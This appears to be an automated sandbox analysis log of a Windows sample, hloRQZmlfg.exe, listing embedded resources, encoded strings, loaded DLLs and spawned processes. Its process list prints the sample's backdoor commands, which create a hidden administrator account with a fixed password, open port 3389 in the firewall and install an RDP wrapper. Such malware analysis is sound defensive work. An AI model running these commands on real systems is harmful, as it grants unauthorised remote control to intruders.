Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: String function: 00407450 appears 135 times
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: String function: 004042F8 appears 74 times

Source: RDPWInst.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: RDPWInst.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
Source: RDPWInst.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: RDPWInst.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
Source: RDPWInst.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RDPWInst.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: RDPWInst.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: RDPWInst.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows

Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRDPWInst.exeB vs hloRQZmlfg.exe
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamerfxvmt.dllj% vs hloRQZmlfg.exe
Source: hloRQZmlfg.exe, 00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRDPCreator.exe4 vs hloRQZmlfg.exe
Source: hloRQZmlfg.exe, 00000000.00000002.1919496760.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs hloRQZmlfg.exe
Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameOpen.Nat.dll2 vs hloRQZmlfg.exe
Source: hloRQZmlfg.exe	Binary or memory string: OriginalFilenameRDPCreator.exe4 vs hloRQZmlfg.exe

Source: hloRQZmlfg.exe, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'w75gTK5M6nzjTjnU+EoLi93dybDJuhTv6xUfacOqvm3ntZls9kVKGw==', 'GIKjK8lRUDXDvmBMrkzqfONOOdT4SguL3d3JsMm6FO/rFR9pw6q+bdiuJS1yJj2wOTluGm4Gl9mQZennlkDvjw=='
Source: hloRQZmlfg.exe, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'Jgk+cpobi4HBt1lw0WE9XNJ89TCIzlhBNL/zJLRgBlm9Fes8fLy7lOqxaoMMFYu4h05s9jjqJGLgjuTH0E+V5A==', 'Jgk+cpobi4HBt1lw0WE9XNJ89TCIzlhBNL/zJLRgBlm9Fes8fLy7lOqxaoMMFYu4h05s9jjqJGLgjuTH0E+V5A==', 'JehuIqkfsZQn0wkdwp2Nv/y8T+57Hbz4jwTgsn8AMlfxiUVZPRQx54pSXRY9M8JQ2umoxBO/Qdf/mHep3Ig9TJeUj4V6VmCFYjcojSKP1YckClxyst9NgCfGZwdRs5kQOl2e24zkqDU='
Source: hloRQZmlfg.exe, U3lzdGVtSW5mb0FB.cs	Base64 encoded string: 'U2dyW+WlE2YacbhqD8LQw/dYBPvUOuPoVsunzrPAfQoHVJJcYxfAV2E0Ximq0mTO24Gft0ff19E6XZ7bjOSoNQ==', 'Xq8So407SNKAzRfCmuKT/ly3DrFODnX5uyrwLzvgmMo6XZ7bjOSoNQ==', 'Xq8So407SNLaCDu3SJO0Fc9Z8WHbi8GwQ2lpakbFuh4TfVtQ1EKwfULNkulliuVh', 'Xq8So407SNKAzRfCmuKT/kOCDYZigawGtO0vHjFlULSJJMEG9cpg/A==', 'Hvsa0AhhunjG28J8qAHgRJENLhIM1RWb/F5T453A6UKDTIehOAc8i41KEtlAK0ui', 'Q7n1HoDaVCNv7RNvVd9BtzWPUPtXLvcOQk9qkg0DAsLpFtHAxn6PWy8NKefrC0og'

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2444
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\hloRQZmlfg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor

Source: unknown	Process created: C:\Users\user\Desktop\hloRQZmlfg.exe "C:\Users\user\Desktop\hloRQZmlfg.exe"
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_1e47a393 GEdtvn58rfdr /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_1e47a393 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_1e47a393 GEdtvn58rfdr /add	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /add	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add	Jump to behavior

Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
